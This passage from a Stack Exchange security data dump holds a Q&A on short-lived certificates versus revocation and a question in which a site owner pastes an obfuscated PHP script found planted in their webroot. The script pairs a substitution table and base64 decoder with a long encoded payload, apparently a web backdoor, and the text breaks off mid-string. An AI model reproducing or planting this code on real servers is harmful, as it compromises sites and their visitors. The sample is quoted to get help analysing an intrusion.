still have BAD password policies and recommendations); and perhaps just a lack of awareness of a better solution. Yes, this is why passwords suck . :-) | {
"source": [
"https://security.stackexchange.com/questions/85934",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56579/"
]
} |
85,963 | I read in the OWASP cheat sheet regarding certificate / public-key pinning that “Google rotates its certificates … about once a month … [but] the underlying public keys … remain static”. Increasing the frequency of key rotation makes sense to me in that, should a key be compromised without detection, the time frame for ongoing damages is reduced. What is the benefit of rotating certificates so frequently? Is it to allow them to use SHA1 (for old-browser compatibility) whilst limiting an adversary's scope for finding a matching signature? Or is there something else that I'm missing? | One big advantage is removing the need for revocation in the event of a compromise. The "typical" way to do this is publishing a certificate revocation list (CRL) or using the OCSP protocol in the event of a compromise to revoke certificates. However, the CRL or OCSP check is incredibly easy to bypass. An attacker in a position to perform a MITM attack can simply block a client from communicating with the server where the CRL is hosted and the client will simply happily go about its business. This behaviour is necessary because of common situations like captive portals that work over HTTPS yet block all other traffic, including traffic to CRL servers. Short-lived certificates have the advantage that in the event of a compromise, the compromised certificate will only work for a very limited period of time until it expires, therefore limiting the damage that can be caused. Adam Langley has written extensively on the subject if further reading is required. | {
"source": [
"https://security.stackexchange.com/questions/85963",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/72398/"
]
} |
86,094 | Somebody hacked my site and uploaded this script ( template46.php ) to my webroot and its content is: <?php
$vIIJ30Y = Array('1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');
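// character-substitution lookup table (see the decoder function v78ZFAX() below)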
function v78ZFAX($vJOJJ7T, $vRJ8WGX){$vM74216 = ''; for($i=0; $i < strlen($vJOJJ7T); $i++){$vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];}
return base64_decode($vM74216);}
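// v78ZFAX(): maps each character of its first argument through the lookup table passed as its second argument, then base64-decodes the result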
$vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.
'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.
'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'.
'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'.
'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'.
'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'.
'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'.
'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'.
'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'.
'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'.
'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'.
'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'.
'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'.
'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'.
'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'.
'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'.
'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'.
'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'.
'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'.
'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'.
'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'.
't8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'.
'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'.
'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'.
'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'.
'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'.
'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'.
'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'.
'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'.
'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'.
'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.
'KgR4SgR4Sgj2X9At28Rk4oxjO97rtH7NMSxOSgR3Sgl22oB24SgOTgj2cgjPK9zcW9710HgGPKBwVe723'.
'bWktbWGO9dm2H7JjipZjKBwVe723SlPKoJPKgxm4HBwV9xGcYgm4HBwV9RQ8eRKWeR2ubz1v9gjOUBt28'.
'7wMSw4TgjOKKfmP97r2Yy4je7N49RKu8710bzcMSgm4HBwV9w3AUBt287aARxOTgjOKKfmP97r2Yy4j8dwVRsrteEKnbWj'.
'OUBt287aXCJPKgxm4HBwV9xGcYfm2ofmu8710bzcMSgm4HBwV9xOTgjOKKfmP97r2Yy4joBLr8wcVe'.
'7QW8E5PKfmP97r2Sp3SgjOKKBr2bEQt9sajixGO87wMbs1d9RQ8eRKWeR2ubz1v9gjO87wMbs1d9R5XRp3SglOO8'.
'7wMbs1d9xGcYB13UBwWRsrteEKnbWjO87wMbs1d9w3A87wMbs1d9xKUSp3SglOO87wMbs'.
'1d9xGcYBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4jUBwZU1cVe'.
'7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4joBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxFnKBr2bEQt9saj'.
'ixkJeRQMRsrteEKnbWjO87wMbs1d9xJjKfktbEQ2bWOTgjOKKBr2bEQt9sajixkzUBwX81cVe7QW8E5PKBr2bE'.
'Qt9sa3YgmzUBwX8gOTgjPKgxmzbzcVYy4jKB9W8srM7s1Wbz1LREKt8zlPKB9W8srMSw4TgjOKKB9W8s4jixkt8fm2b'.
'2cVe7QW8E5PKB9W8sr8Yz9W8s4ARxOTgjOKKB9W8s4jixkvU7ru8710bzcMSg'.
'mzbzcVSp3SglOO9dKn8xGcYfm2ofmu8710bzcMSgmzbzcVSp3SglOO9dKn8xGcYftvU7ru87'.
'10bzcMSgmzbzcVSp3SglOSgl2X9AGPbEmWbEmWSgmzbzcV6gGA74Q'.
'warmipw4ASxGcixkBlaNpmxOSgl2TgjOKgxmzbzcVYy4j9dKn8wcP8EQ4S'.
'gmzbzcVSp3Sgl2cgjOK97NM9lPKgR3SglOKKB9W8s4jixkMUfKubzwJ8B109xjA74Qwarmipw4A6g'.
'GAYAJjKB9W8s4XCJPKgR4SgjOKKBrtH7N2bAGcYgmVe7239RKM7s1Wbz1LREKt8zlPKBr'.
'tH7N2bd5XRp3SgjOKbswv91cVe723SgmzbzcV6gGO97rtH7J3Ygm4HBwV9xJjK'.
'Br2bEQt9sa3YgmVe7239RYXCJPKulXcgjXzU7L0UB2n8AkM97LORsrtH7JPKB'.
'9W8s43Ygm48WJjKfQrezP3Ygm49Rt46gGO871X8BwWSlXTgAGjYgGOHBwt9gGcYgYACJPSYgGjYgmr8AGcY'.
'fQ4bdmnURkJ9RYPU7LXb72OSfmX87aPSxOXCJPSYgGjYgmP971OYgZcYgKBb'.
'zcVCAGO9dKn8wNvY03SYgGjYgmP971OYgZcYgKe6artH7N2b0PjKBrtH7N2b2NvY03SYgGjYgmP971OYgZcYgKx9Rk3oxra8MPj'.
'KB9W8srb8AYTgjPjYgGjKBt2e7lj604jYOrX87aVwzwWbs2n80Pj5xZJRBZACJPjYgGjKBt2e7lj604jYOQn8dm28dlVwf2J9'.
'pPj8Rw3UB2JeRK46s13UBwW8z14HR92CWYTgAGjYgGOHBwt9gGvixGAezcr8zmtbdOcRgYV6x4V6x4V6x4VYAZO'.
'U7ZvY2JARBLb8AYTgAGjYgGSYgGjYgmJ8B1X8AGcYfQ4bz2JREmt9E5PKfm2oflXCJPjYgGjKfXt9WGcYgYV6x4V6x'.
'4V6x4V6x4A6Amr8AZARBLy8sL497L46wmLbBaDYfm2oflnbBNtH7ZTYBQ'.
'PeRKM9RlcRgKKa4FVCyjrCx4NRgYTYB9nbzrtUyrz8BcE97mb8AYTgAGjYgGOoz1dYgZcYgKy8sL'.
'497L46wmWe7LM9zwW6awvescOH7LdCAGEez24RBLb8AYvKfk3e72v6AKb82NvY03SYgGjYGPjYgGjKf'.
'Xt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvY2NvlscvUBwvUgraoRk2CAk49Rt46'.
'st487JTYBQPeRKM9RlcRgKKa4FVCyjrCx4NRgYTRBZACJPjYgGjKfXt9WGvixGAlscvUBwvUgrabz1vbs'.
'92bAr18zQn9B2v9MPjQsKXU1NvRBZOUBwZU1NvRBZACJPjYgGjKfXt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvYA4VY'.
'03SYgGjYGPjYgGjH7ePescr8dlPK1cBxaN1aWOjiAGJSlPjYgGjoJPjYgGjYgGjYB9nbzwtesjPK1cBxa'.
'N1aWktbWGO9z239xOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYB2zSB9X8'.
'Bwu9RtXbEmMSgmzH7N27WK48Rku8z1V9xKUSxOSYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgG'.
'jKBejixkz8Ek28AjO9z239w3AUBrJRsLt87aARxJjYdKAYAOTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgY'.
'V6x4V6x4V6x4V6x4A6Amr8AZARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgraoRk2CAktbfk'.
'3H7QtUB2n8AcneEm2UgrMUfK2e74TY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj60'.
'4jYzLt87acRgYA6AmzH7N27WKve7r2Y24vY2JARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgr'.
'abz1vbs92bAr18zQn9B2v9MXAeRQ2Q0mb8AYTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgKy8sL497L46amXbE'.
'knbs24H7cvCz14UB10HBr28dlTY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj604jYz9X8Bwve7r2iwJAYAZO9z239w3A8z1V9'.
'xKU6AKbY2NvRBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixk0HfwvHr'.
'cMbBNXUgtAeRQ2Q0mu97L08sm2SB9W971OSgmz6gkzH7N2bs2D9xjO9z239w3AUBrJRsLt87aARxOXSxO'.
'vY2NvY03SYgGjYgGjYgGjYgGjYgGjYB908BcM9xjO9AOTgAGjY'.
'gGjYgGjYgGjYf4SYgGjYgGjYgkcgAGjYgkcgjPjYgGjH7ePlBrtH7JPKfmn6gGObEwAHAJjKfXt'.
'9WJjKBt2e7lXSlPjYgGjoJPjYgGjYgGjYB2zSg128Rk4oxjORrkiarm8KE92bzKnbsadRxOXgAGjYgGjYgGjYgG'.
'jYBw0HBFjY2Q1pOm1mgYTgAGjYgkcgAGjYgk28fQ2gAGjYgkTgAGjYgGjYgGjH7ePY7wVbfmLSgmuahcpw13dUzwWezcM9xUU'.
'SxOSYgGjYgGjYgGjYgGj97QP8WGAmO1KpgYTgAGjYgkcgd4Sgz9r8zQ4H7cvYB13UBwWRsrteEKn'.
'bWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQTSgZISR40w7Od6gGOescvUBwvUgJjKBrtUBQP9R5XCJPSYgGjY'.
'B9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ85w4XCWGOHx3qSlPjYgGjoJPSYgGjYgGjYgG'.
'O8d5jixk2ofk38sm2SgKFYAJjKBrtUBQP9RQ85wr8KB2USp3SYgGjYgGjYgGOeMYjixk08EwvUgjO8d5XCJPjYgGjYgG'.
'jYgmWe7LOYy4jbz1v9gjJ6gGPKB5WYg4j5xOXCJPjYgGjYgGjYgm08sL497L4Yy4jbEmWREK2bBNtesaPYd3A6Am'.
'VeRm0HBwM7M1U7WmXRxZAuxY3Ygmvbr3Obz1v9143Ygm08sL497L4S'.
'p3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjUBw'.
'ZU1cVe7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sgb0R1VamwtaRg4P7r3D9B2dHRlDRw4qSwJVS'.
'1V8CzmX9s24C2rUSW2bRx5d6gGOescvUBwvUgJjKBrtUBQP9R5'.
'XCJPSYgGjYB9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ8514XCWGOHx3qSlPjYgGjoJPjYgGjYgGjYgmVH7ZjixG'.
'O8714est2br3NRw3OHw4TgAGjYgGjYgGjKBrtogGcYgmVeRm0HBwM7MKU7WmXRp3SYgGjYgGjYgGObz1v9gGcYfKt8zlPKBr'.
'X8AJjKBrtogOTgAGjYgGjYgGjKfUnbzljixkd97L2bz149wcE8EKOSgmWe7LOSp3SgAGjYgGjYgGjKB'.
'Qn8dm28dljixkJbzwdREK2bBNtesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB'.
'2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAGjYgkcgjPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rm171mb6xt87MXOH'.
'7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EYPKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7'.
'MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGOescr8dljixGO8714est2br3NRw3OHw4TgjP'.
'jYgGjYgGjYgmE8EKOYgGcYBU28zwWeRm2REUnbzlPKBQnU7L4Sp3SgAGjYgGjYgGjKBQn8dm28dljixkJbzwdREK2bBN'.
'tesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAG'.
'jYgkcgjPSYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjoBLr8wc'.
'Ve7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sg'.
'b0R1VCwarb6xt87MXOH7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EY'.
'PKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGO8dwVY'.
'y4jKBrtUBQP9RQ85wr8KB2UCJPjYgGjYgGjYgmVH7ZjixkJ8EbP5pG3YgmvU74j6xGNSp3SYg'.
'GjYgGjYgGO871ZYy4jbBcESyhJ6gGO8dwVSxGVYyhTgjPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6g'.
'GO871ZSp3SYgGjYgGjYgGOescvUBwvUgGcYfQ4b2cW9Rk3e7Q2SgmVeR'.
'm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp3SYgGjYf4SYgGjYfK2UfwW8AGOescvUB'.
'wvUy3SulPS9dwveEmX8sZj8dwVRsrteEKnbWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rKkpOmb6xt87M'.
'XOH7UXUyXURx3XRg4P7r3D9B2dHRlDRw4qSwNUYWb3Ygm08sL497L46gGO8714est2bWOTgjP'.
'jYgGj9zcWSgmXYy4j5y3jKBOjigk08EwvUgjO8714est2br3JRxOTYgmXSW3XgAGjYgkTgAGjYgGjYgGjKBrX8AGcYgmV'.
'eRm0HBwM7M1U7WmXRp3SYgGjYgGjYgGO871ZYy4jKBrtUBQP9RQ'.
'852r8KB2UCJPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6gGO871ZSp3SYgGjYgGjYgGOescvUBw'.
'vUgGcYfQ4b2cW9Rk3e7Q2SgmVeRm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp'.
'3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZj9swv9RKtUBwuUscW9gjO8Bwv9EmPSlXTgAGjYgGOesttb'.
'd5jixGde7K09Bwz9stXHzV387Lnbf1WbEmrUd2ZoAbTgAGjYgGO8dwVlsttbd5jixkMUfK397ZPKBQPeRKMSp3SYgGjYgm'.
'MUfKX8zbjixGdKM3SYgGjYB9nbAjOHxGcYyGTYgmXYyJjKBN28zU4Hy3jKBOqSWOSYgGjYf3SYgGjYgGjYgGObEmWH7Ld'.
'YgZcYfQredQ4bAjOesttbd53YfKt8zlP5xJjKBLr8aQPeRKMSxGVYyh3YyhXCJPjYgGjulPjY'.
'gGjbzw4URKvYgmMUfKX8zbTgd4Sgz9r8zQ4H7cvYfktbEQu8710b'.
'zcMSgm08sL497L46gGObB1MbswMSlXTgAGjYgGObB1MbWGcYB1Wbz1LREknbgjObB1MbswMSp3SYgGjYGPj'.
'YgGjbzw4URKvYfQ4b2cW9Rk3e7Q2SgK8ah1par4A6gGObB1MbWJjKBQn8d'.
'm28dlXCJXcgjXzU7L0UB2n8AkzUBwX81cVe7QW8E5PKBQn8dm28dl3YgmzUBwX8gOSoW'.
'GjYgGSYgGjYfK2UfwW8AkMUfKubzwJ8B109xjA749ama25RxY3YgmzUBwX8gJjKBQn8dm28dlXCJ'.
'XcgjXzU7L0UB2n8AkXbrcXbgjObEmWSxkTgAGjbzw4URKvYfkW97Uu8714esjPYAcoS13N6p2Uu13N6'.
'p2U7MGVCwrF5w3J6p2U7MGVCwrF523J6pmU7MGVCwrF50w85g4rRxOPRgZP7MGVCwrF7MhVCwr85g4LRRJ'.
'N7MGVCwr85g4LRRJW7MGVQ1r85g4LRRJWQw3J6pwUSx2T5E4O6W'.
'Y3KfQ4bAOTgd4Sgz9r8zQ4H7cvYB9W8sruHBcMUgjOescvUBwvUgOSoJPSYgGjYgmP8EQ4Yy4jbfK29'.
'rcW9Rk3e7Q2SgbnRAtEUEUF9dmJSwJv6sOd6gbd6hGORrQ1a291a23dx1maa1cYprQaKr4XCJPSYgGjY'.
'B2zYgtXbrcXbgjOHBcMUgOXgAGjYgkTgAGjYgGjYgGjbzw4URKvYgm08sL497L4C'.
'JPjYgGjulPjYgGjgAGjYgGOUBcq97LMYy4j9RtJ8BcO9xjAlgY3Ygm08sL497L'.
'4Sp3SgAGjYgGOescvUBwvUgGcYgm48sV28dQ8514j6AGAlgYj6AGOHBcMUgGvYg'.
'Y+Y03SgAGjYgkW9RmrbzZjKBQn8dm28dlTgd4Sgz9r8zQ4H7cvYBwWbzcWRMl'.
'JQgjXgd3Sg7t2e7m2bAjAx1maagFN60hjQyG4YhLnUgkB8Ewv9gYXCJPSgxmrbzOjixkJbzwdREK'.
'2bBNtesaPKWFPRyFX6APO6Wb3Ygbd6gGORrQ1a291a23daOwmwawpw1cwaOOdRxGXCJPS'.
'gxm08sL497L4Yy4jeEwMUBcVRst4UfkubzwNU7wMUyhPYzt4UfGD6'.
'WFA6Amua4wxwOwx7WUYw1mlR4tiarldRxZA641Ba7XypOtvHytx'.
'UfmBxpQ7pRKg9Bm9UM9W8zU6o0U6mahASp3Sgxm08sL497L4Yy4jb'.
'EmWREK2bBNtesaPYgYnla9mHOQCxBLPC1K4Uh9K5r9QbOKO912EQdKv94VDQ4V1lxY3Ygmrb'.
'zO3Ygm08sL497L4YgOTgjPK9RtXUgjjKBQn8dm28dljSp3SulPSgz9r8zQ4H7cvYBQrbEmn8wcPUfmJREK2bRw2bElNSgmJe'.
'RKt8R5Xgd3SYgGjYB2zSgGtYB2MRs1Wbz1LSgmJeRKt8R5XYgOSYg'.
'GjYf3SYgGjYgGjYgGObB1We7rMYy4jeRKWeROPgAGjYgGjYgGjYg'.
'GjYgUrbzJdYy4+YgmJeRKt8R53gAGjYgGjYgGjYgGjYgUV9RmP8sldYy4+YgUfmwldgAGjYgGjYgGj'.
'Sp3SYgGjYf4SYgGjYGPjYgGjH7ePYgmJeRKt8RQ8KEwW8gUUip4dKWG'.
'XYfK2UfwW8AkBlaNpmp3SYgGjYGPjYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3'.
'd87w4HBcOKr4XYgOjKfktbz1Vbr3d87w4HBcOKr4jixGPHRQM9RlPKf'.
'ktbz1Vbr3d9B14exUUSxezHRQueRKWeROPKfktbz1Vbr3d9B14exUUSxOjiWGdahcpwg'.
'bjCAGdm4waKM3SYgGjYgmJeRKt8RQ8Ksr2UBtn9gUUYy4jbEmWUBcrbfk2bAjOb'.
'B1We7rM7WUV9RmP8sldRxOTgAGjYgkX9AjjYxkX82ctbdKtoxjObB1We7rM7WUV9R'.
'mP8sldRxJjeRKWeROPK4U1wgb3YgUlprQaKWOXYgOjbzw4URKvYh9kp1Q1CWGSYgGjYGPjYgGj6WPj4K/mj'.
'QgZ466lnVg4460lngymjUBk4enlvcgD4e5j46Yj46/mjQgJ466lvQgT4eMlnUB646Oj466'.
'lvQg4YgPngAGjYgGOURK3Yy4jbB1WbswuURK3SgmJeRKt8RQ8KEwW8gUUSp3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KEQ0HBwV9xU'.
'USxGXYgmrbzN8KEQ0HBwV9xUUYy4jKst4UfGdCJPjYgGjH7ePYghjHRQM9RlPKfwW813dbB14HgUUSxGXYgmrbzN8K'.
'EktUBjdRxGcYgbnKM3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KstnbEldRxOjKAejHRQM9RlPKfwW813dbB14HgUU'.
'SxGXgAGjYgkTgAGjYgGjYgGjH7ePYfQ4bdknbWjOURK37WUJeRmPKr43YgbnKWOjSlPjYgGjYgGjYf'.
'3SYgGjYgGjYgGjYgGjKfwW813dHBcMUgUUYy4jbEwAbEmWSgmrbzN8KEktUBjdRxJ'.
'j5gJjbEmWbBcMSgmrbzN8KEktUBjdRxJjKWFdSxOTgAGjYgGjYgGjY'.
'gGjYgmrbzN8KEktUBjdRxGcYfQredQ4bAjOURK37WUJeRmPKr43YfQ4bdknbWjOURK37'.
'WUJeRmPKr43YgbnKWOXCJPjYgGjYgGjYf4SYgGjYgGjYgk28fQ2gAGjYgGjYgGjoJPjYgGjYgGjYgGjYgGOU'.
'RK37WUP8EQ4Kr4jixGOURK37WUJeRmPKr4TgAGjYgGjYgGjYgGjYgmrbzN8KEktUBjdRxGcYgbnKM3KgAGjYgGjYgGjulP'.
'jYgGjulPjYgGjKfwW813dbB14HgUUYy4jbfK29rcW9Rk3e7Q2SgYn7rNb6r4q6WY3YgYnYAJjKfwW813dbB14HgUUSp3S'.
'YgGjYB2zSgkXbEQ2UgjOURK37WUNU7wWoxUUSxGXYgmrbzN8KEktUBjdRxGv'.
'ixGAiE3OURK37WUNU7wWoxUUuxYTgAGjYgGSYgGjYgmJ8EK4Yy4jHR'.
'QM9RlPKfktbz1Vbr3dbBcWUgUUSxG/YgmJeRKt8RQ8KEknbdldRlPjYgGjYgGjYgGjYgGDYgjjHRQM9RlPKfwW813dbBc'.
'WUgUUSxG/YgmrbzN8KEknbdldRxGDYgjOURK37WUMest287adRp4cKst4UfkMKMF4Qy5DCyGXYgOTgAG'.
'jYgGSYgGjYgm4H7r28Ew4Yy4jHRQM9RlPKfktbz1Vbr3dUB2V97crUgUUSxG/YgmJeRKt8RQ8KEmX87wnURldRxGDYy5JCJP'.
'jYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3dbzw4URKvKr4XYgOjKfktbz1Vbr3dbzw4URKvKr4jixGdescvUBwvUgbTgAGjYgGS'.
'YgGjYgmMest287ajixGOURK37WUMest287adRp4cKst4UfkMKWG/YgUMbsJD6WFdCAbdCJPjYgGjKB9JYy4jlB'.
'9M8sQq8Ek28AjObsQP97r26AmrbzN8KstnbEldRxJjKfknbdl3Ygm2bdKv8WJjKBwWbdQ4bAJjKfmX87wnURlXCJPjYgG'.
'jH7ePYgmzbgGXgAGjYgkTgAGjYgGjYgGj6WPjp7cDH7N3exGI6JPjYgGjYgGjYB2zSgGtYB2Mbsw4SgmJe'.
'RKt8RQ8KrwM9RYVl7U28dldRxOjSxGObB1We7rM7WUwbswW6a1d97L4Kr4jixGAp7cDH7'.
'N3exFr60GjSB2lHBcv9p3jwp3jlrkwYB2lHBcv9xkiaWGMRMGj8B2q9xkQe75jpr5j7y3j97Z'.
'VUR5XYh1JbBN2wswAxs246MaWCgZNCgGPx4tapaJ3YBNXHsajmsw0HsFXY192bdQX8sZnQgZJYhrnez2'.
'39xFElp545xkpe79tbzOnQpYZ60hsY03SYgGjYgGjYgGSYgGjYgGjYgGObzwNU7'.
'wMUgGcYgKTKfktbz1Vbr3d87w4HBcOKrrcYf3OURK37WUJeRmPKrrcYhtaw1Gn5xZJRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jYOtnbElDYf3OURK37WUP8EQ4KrrcRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jY2wM9RYVl7U28dlDYf3ObB1We7rM7WUwbswW6a1d97L4KrrcYAZARfKb8AYT'.
'gAGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KEK29zwW9RYdRxOjSxGObzwNU7wMUg'.
'GvixGAazwz9RK2b0PjoWmJeRKt8RQ8KEK29zwW9RYdRRrbb2NvY03SYgGjYgGjYgkX9AjjHRQM9'.
'RlPKfktbz1Vbr3descnHs22Kr4XYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgm08scqH7ajixGAY03SYgG'.
'jYgGjYgGjYgGjH7ePYB2MRs1Wbz1LSgmJeRKt8RQ8KsQn8sVX9xUUSxGXYfVz8EK2e7QPSgGObB1We7r'.
'M7WU08scqH7adRxktbWGOHM4+KfejSxGOescnHs22YgZcYgYOHM4OU03jY03jKBQn8sVX'.
'9xGcYfQredQ4bAjOescnHs226yG36pYXCE4SYgGjYgGjYgGjYgGj97NM9xGOescnHs22Yy'.
'4jKfktbz1Vbr3descnHs22Kr4TgAGjYgGjYgGjYgGjYB2zSgGOescnHs22Yp4dKWGXYgmW9R1r9RQ4YgZcYgKy8scqH7aD'.
'Ygm08scqH7wbb2NvY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jYOQn8zL2eEmX8sZDYBQ38EQ2RfKb8AYT'.
'gAGjYgGjYgGjH7ePYgmJeRKt8RQ8Ksr2UBtn9gUUip4dahcpwgbjSlPjYgGjYgGjY'.
